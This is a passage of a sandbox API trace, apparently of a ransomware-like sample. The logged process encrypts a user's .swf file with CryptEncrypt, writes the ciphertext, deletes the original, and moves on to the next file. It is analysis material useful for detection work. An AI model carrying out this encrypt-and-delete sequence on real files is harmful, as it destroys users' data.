Size=0x10) returned 0x43cacd0 [0101.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0101.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0101.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0101.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0101.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0101.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0101.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0101.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0101.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0101.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0101.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0101.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0101.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0101.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0101.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0101.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0101.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0101.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0101.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0101.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0101.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0101.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0101.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0101.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0101.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0101.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0101.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0101.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0101.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0101.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18727) returned 0x49b2738 [0101.297] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0101.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0101.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0101.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0101.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43caf28 [0101.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caf28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0101.298] CryptEncrypt (in: hKey=0x41ac540, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e088*=0x18727, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e088*=0x18730) returned 1 [0101.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cd0 [0101.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0101.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0101.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0101.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0101.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0101.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ca0 [0101.298] CharLowerBuffW (in: lpsz="byte[100145]", cchLength=0xc | out: lpsz="byte[100145]") returned 0xc [0101.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0101.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0101.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b50 [0101.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0101.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c70 [0101.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0101.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c50 [0101.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0101.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bc0 [0101.299] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0101.299] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0101.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0101.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2be0 [0101.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0101.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43caeb0 [0101.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caeb0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0101.299] CryptEncrypt (in: hKey=0x41ac540, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49b2738*, pdwDataLen=0x144e088*=0x18727, dwBufLen=0x18730 | out: pbData=0x49b2738*, pdwDataLen=0x144e088*=0x18730) returned 1 [0101.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0101.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eab80 [0101.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0101.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0101.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0101.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0101.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d20 [0101.300] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0101.300] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0101.300] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0101.301] WriteFile (in: hFile=0x298, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0x18730, lpNumberOfBytesWritten=0x144ea8c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ea8c*=0x18730, lpOverlapped=0x0) returned 1 [0101.304] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0101.304] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0101.304] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0101.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b90 [0101.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c20 [0101.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0101.304] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0101.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0101.304] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cabe0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0101.304] CryptDestroyKey (hKey=0x41ac540) returned 1 [0101.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0101.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e90 [0101.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0101.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0101.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0101.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0101.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0101.304] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0101.305] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0101.305] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0101.305] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0101.305] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0101.305] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0101.305] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0101.305] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0101.305] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0101.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bc0 [0101.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bf0 [0101.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0101.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0101.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e48 [0101.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0101.305] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0101.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0101.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0101.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8c8 [0101.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0101.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0101.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0101.305] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0101.306] FreeLibrary (hLibModule=0x756e0000) returned 1 [0101.306] CloseHandle (hObject=0x258) returned 1 [0101.309] CloseHandle (hObject=0x298) returned 1 [0101.314] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\3lc9YJH.swf", nBufferLength=0x7fff, lpBuffer=0x143ea88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\3lc9YJH.swf", lpFilePart=0x0) returned 0x4d [0101.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0101.314] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\3lc9YJH.swf" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd\\3lc9yjh.swf")) returned 0x20 [0101.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0101.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0101.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0101.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7f98 | out: hHeap=0x1780000) returned 1 [0101.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0101.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0101.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0101.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0101.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0101.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0101.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0101.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0101.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0101.315] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\3lc9YJH.swf", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc2f0d90, ftCreationTime.dwHighDateTime=0x1d5f0ac, ftLastAccessTime.dwLowDateTime=0x588a2820, ftLastAccessTime.dwHighDateTime=0x1d5e455, ftLastWriteTime.dwLowDateTime=0x588a2820, ftLastWriteTime.dwHighDateTime=0x1d5e455, nFileSizeHigh=0x0, nFileSizeLow=0x18727, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="3lc9YJH.swf", cAlternateFileName="")) returned 0x41ac780 [0101.315] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\3lc9YJH.swf" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd\\3lc9yjh.swf")) returned 1 [0101.317] FindNextFileW (in: hFindFile=0x41ac780, lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc2f0d90, ftCreationTime.dwHighDateTime=0x1d5f0ac, ftLastAccessTime.dwLowDateTime=0x588a2820, ftLastAccessTime.dwHighDateTime=0x1d5e455, ftLastWriteTime.dwLowDateTime=0x588a2820, ftLastWriteTime.dwHighDateTime=0x1d5e455, nFileSizeHigh=0x0, nFileSizeLow=0x18727, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="3lc9YJH.swf", cAlternateFileName="")) returned 0 [0101.317] FindClose (in: hFindFile=0x41ac780 | out: hFindFile=0x41ac780) returned 1 [0101.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0101.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0101.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0101.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0101.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7ef0 | out: hHeap=0x1780000) returned 1 [0101.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0101.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0101.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0101.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0101.318] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0101.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0101.318] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0101.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0101.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0101.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0101.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0101.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0101.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0101.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0101.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0101.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0101.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cccb0 | out: hHeap=0x1780000) returned 1 [0101.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0101.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0101.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0101.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0101.318] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0101.318] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0101.319] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0101.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0101.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0101.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0101.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0101.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0101.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0101.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0101.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0101.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0101.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0101.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0101.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0101.319] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0101.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0101.319] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\GPtGPTImgDjIi0576udd.swf", lpFindFileData=0x144e970 | out: lpFindFileData=0x144e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c544b70, ftCreationTime.dwHighDateTime=0x1d5efa5, ftLastAccessTime.dwLowDateTime=0xf9905a0, ftLastAccessTime.dwHighDateTime=0x1d5ec16, ftLastWriteTime.dwLowDateTime=0xf9905a0, ftLastWriteTime.dwHighDateTime=0x1d5ec16, nFileSizeHigh=0x0, nFileSizeLow=0x8e18, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="GPtGPTImgDjIi0576udd.swf", cAlternateFileName="GPTGPT~1.SWF")) returned 0x41abfc0 [0101.319] FindClose (in: hFindFile=0x41abfc0 | out: hFindFile=0x41abfc0) returned 1 [0101.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0101.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0101.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0101.319] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0101.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391cb0 | out: hHeap=0x1780000) returned 1 [0101.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0101.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0101.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0101.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0101.320] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0101.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0101.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0101.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0101.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0101.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0101.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 